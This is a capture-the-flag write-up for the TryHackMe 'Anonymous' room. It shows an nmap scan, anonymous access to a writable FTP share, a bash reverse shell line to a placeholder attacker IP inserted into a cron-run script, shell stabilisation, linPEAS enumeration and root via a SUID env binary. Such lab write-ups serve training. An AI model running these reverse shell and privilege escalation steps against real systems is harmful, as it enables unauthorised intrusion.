Contents

Anonymous

Not the hacking group

Difficulty: Medium

Room: Anonymous

Created by: Tyr4el

Standard nmap scan

nmap -sC -sC -vv -A $IP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
PORT    STATE SERVICE     REASON         VERSION
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 May 17 21:30 scripts [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.11.8.122
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
|   256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   ANONYMOUS<00>        Flags: <unique><active>
|   ANONYMOUS<03>        Flags: <unique><active>
|   ANONYMOUS<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 12594/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 14837/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 30708/udp): CLEAN (Failed to receive data)
|   Check 4 (port 40880/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2020-05-18T18:36:45+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-18T18:36:45
|_  start_date: N/A

The inital scan shows FTP 21 allowing anonymous login and even writable. This is a great starting point. Let’s see what’s on the share.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
🚀 ftp 10.10.182.175
Connected to 10.10.182.175.
220 NamelessOne's FTP Server!
Name (10.10.182.175:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 May 17 21:30 scripts
226 Directory send OK.

ftp> cd scripts
250 Directory successfully changed.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 May 14 14:52 clean.sh
-rw-rw-r--    1 1000     1000          258 May 18 18:45 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12 03:50 to_do.txt
226 Directory send OK.

Let’s grab all these files offline and take a look.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
ftp> prompt off
Interactive mode off.
ftp> mget *

local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (98.9482 kB/s)
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (258 bytes).
226 Transfer complete.
258 bytes received in 0.00 secs (9.1129 MB/s)
local: to_do.txt remote: to_do.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.04 secs (1.7995 kB/s)
/images/anonymous/todo.png/images/anonymous/clean.png/images/anonymous/removed.png

The files give us a good indication we are dealing with a clean up script that runs on a cron. The good news is we can write to all the files in this directory.

We can safely assume clean.sh runs with a cronjob. We’ll setup a netcat listener to catch a bash shell. Shameless plug for shellgen! I grabbed: bash -i >& /dev/tcp/your_ip_here/9001 0>&1

/images/anonymous/shellgen.png
https://github.com/briskets/shellgen/

You can do this several ways. I’ll be mounting the share with curlftpfs and modifying the clean.sh with vim.

mkdir ftp $IP

curlftpfs anonymous@$IP ftp/

ls to make sure it mounted.

/images/anonymous/ftp.png

/images/anonymous/clean_mod.png You could completely replace clean.sh and chmod +x it’s up to you.


We’re now namelessone. Let’s stablize the shell.

1
2
3
4
5
namelessone@anonymous:~$ python -c 'import pty;pty.spawn("/bin/bash")'
namelessone@anonymous:~$ export TERM=xterm-256-color
CTRL + Z
stty raw -echo
fg

Let’s get the user flag. Also, if you tried enumerating the SMB share there’s a pics directory with some pics of some puppers 🐶️!

/images/anonymous/user.png

Spin up a python http server, upload linPEAS, and tee to an outfile to reference later if needed.

1
2
3
namelessone@anonymous:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
namelessone@anonymous:~$ ./linpeas.sh | tee peas.out

uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)


sudo -l requires a password which I don’t know. This user is also apart of lxd which could be a potential privesc path. No need to go this route but I included the method in Related Reading below if you’re interested.


There’s a SUID for /usr/bin/env. Running /usr/bin/env /bin/sh -p we can see our users euid is now 0(root)!

/images/anonymous/root.png

Although we didn’t need to do anything fancy to exploit the cronjob it’s good to know common methods for privilege escalation. Raj Chandel has written a very nice article explaining these privesc methods. Bookmark this page as you’ll run into it on THM and other platforms if you haven’t already.

HackingArticles.inExploitDB